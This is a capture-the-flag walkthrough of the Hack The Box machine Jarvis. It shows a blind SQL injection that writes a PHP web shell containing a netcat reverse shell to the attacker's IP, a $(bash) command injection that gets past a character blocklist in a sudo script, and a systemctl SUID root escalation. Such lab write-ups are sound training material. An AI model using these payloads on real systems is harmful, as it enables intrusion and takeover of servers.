Hack The Box (HTB) Jarvis without SQLmap. Totally different Approach
Hi guys, hope you are doing well !!! :). This is my first post on medium :)
Today I am going to solve Jarvis (IP- 10.10.10.143) from hack the box. It’s a retired machine. I will use ‘write into file’ through SQL injection functionality to inject the php shellcode and get a reverse shell.
Lets get started.
I started with nmap scan with command nmap -sV -sC -o nmap 10.10.10.143 & found port 22 and 80 open.
Port 22 will be used if I get any credential. I moved to port 80 and found ‘Hotel stark’ page
I checked the application and found one parameter which could be vulnerable to SQL injection
By changing the parameter 3 to (4–1)or (5–2), I got the same results as 3. There was a blind SQL here. I found total number of columns to be 7 by inserting 3 order by 7 — in place of 3.
As I tried putting 3 order by 8, it did not give me any results which meant total number of columns were 7.
I knew it was possible to achieve RCE through SQL injection by ‘write into file’ functionality in mysql. We can also read filesystem like /etc/passwd or other files depending on the permissions.
But here, Since it was blind SQL, nothing was returned so it was not possible to read /etc/passwd but there was a possibility to inject shellcode.
Since it is an Apache server, we can write file into /var/www/html/shell.php. I captured the request in burp
and changed the value of 3 to-
3 union all select 1,2,3,4,5,6,’<?php passthru(“nc -e /bin/bash 10.10.14.13 443”); ?>’ into outfile ‘/var/www/html/shell.php’ —
what we are trying here is to inject our payload into the seventh column and will access it through web.
I opened listener 443 in my command prompt and accessed shell.php like http://10.10.10.143/shell.php & got a reverse connection to my machine
Upgraded my shell using python -c ‘import pty;pty.spawn(“/bin/bash”)’
The shell I got was of www. I could not access user.txt since the access was denied and it seemed only pepper can access it.
I tried sudo -l and www was able to run command /var/www/Admin-Utilities/simpler.py as pepper
I checked the script and one function caught my attention- def exec_ping():
forbidden = [‘&’, ‘;’, ‘-’, ‘`’, ‘||’, ‘|’]
command = input(‘Enter an IP: ‘)
for i in forbidden:
if i in command:
print(‘Got you’)
exit()
os.system(‘ping ‘ + command)
Note: whenever encounter a script, try to find any exec function in it as it can get you command injection
This script is executing OS command along with ping but ‘&’, ‘;’, ‘-’, ‘`’, ‘||’, ‘| are blocked. But $ is allowed so i tried that-
I ran sudo -u pepper /var/www/Admin-Utilities/simpler.py -p and when as ked for IP i gave $(bash) and got shell as pepper
I was not able to run any command, so took reverse shell of pepper on my Kali machine on port 4444
For root, I ran linpeas.sh and found one vulnerable parameter- in privilege escalation through SUID which was systemctl
After some research, I created a file as below and transferred it to victim machine
I ran command /bin/systemctl enable /home/pepper/root.service & started the service by /bin/systemctl start root
Got shell as root :)
So, this was it. Do let me know if you guys want to see any other HTB in a different approach or any topic , will try to cover :)
